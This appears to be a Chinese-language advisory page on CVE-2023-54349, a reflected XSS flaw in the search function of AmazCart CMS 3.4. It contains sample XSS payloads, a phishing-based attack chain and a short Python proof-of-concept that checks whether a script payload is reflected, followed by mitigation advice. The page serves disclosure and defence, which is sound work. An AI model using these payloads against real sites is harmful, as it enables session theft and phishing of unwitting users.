CVE-2023-54349 CVSS 6.1 中危

CVE-2023-54349 AmazCart CMS反射型XSS漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-54349

漏洞类型

反射型跨站脚本 (Reflected XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AmazCart CMS

漏洞概述

AmazCart CMS 3.4版本存在一处反射型跨站脚本（XSS）漏洞。该漏洞源于产品的搜索功能未能正确过滤用户输入，导致未经身份验证的攻击者可以在搜索框中注入恶意JavaScript代码。当受害者查看包含恶意载荷的搜索结果或历史记录时，脚本将在其浏览器中执行。攻击者利用此漏洞可窃取用户Cookie、会话令牌或重定向用户至钓鱼网站，对用户隐私和系统安全构成威胁。

技术细节

该漏洞属于反射型XSS，主要发生在AmazCart CMS的搜索处理模块中。由于应用程序未对用户通过搜索参数提交的数据进行严格的转义或过滤，攻击者可以构造包含HTML或JavaScript标签的特制URL或输入。例如，在搜索框中输入<script>alert(document.cookie)</script>，服务器将此恶意载荷反射回响应页面，且未进行适当的上下文编码。当受害者点击攻击者精心构造的链接或触发搜索机制时，恶意脚本将在受害者的浏览器上下文中运行。由于无需身份认证即可触发，且具有用户交互要求（UI:R），攻击者通常结合社会工程学诱导用户点击链接，进而劫持用户会话、执行恶意操作或篡改页面内容。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标网站使用的是AmazCart CMS 3.4版本。

STEP 2

2. 构造载荷

攻击者构造包含恶意JavaScript代码的URL，利用搜索功能未过滤的特性，例如：?search=<img src=x onerror=alert(1)>。

STEP 3

3. 诱导访问

攻击者通过钓鱼邮件或社交网络将特制链接发送给目标用户。

STEP 4

4. 触发漏洞

受害者点击链接，浏览器向服务器发送搜索请求。

STEP 5

5. 执行脚本

服务器将恶意代码直接反射在响应页面中，受害者的浏览器解析并执行该脚本，导致攻击者获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2023-54349
# Reflected XSS via Search Parameter

import requests

target_url = "http://target-amazcart.com/search"
payload = "<script>alert('CVE-2023-54349')</script>"

params = {
    "q": payload  # The parameter name may vary, 'q' is used as an example
}

try:
    response = requests.get(target_url, params=params)
    if payload in response.text:
        print("[+] Vulnerability Confirmed: Payload reflected in response.")
    else:
        print("[-] Vulnerability not confirmed or payload encoded.")
except Exception as e:
    print(f"Error: {e}")

影响范围

AmazCart CMS 3.4

防御指南

临时缓解措施

在未升级版本前，建议管理员暂时禁用站内搜索功能或对搜索输入实施严格的输入验证和输出转义过滤。同时，应对用户进行安全意识培训，避免点击来源不明的链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表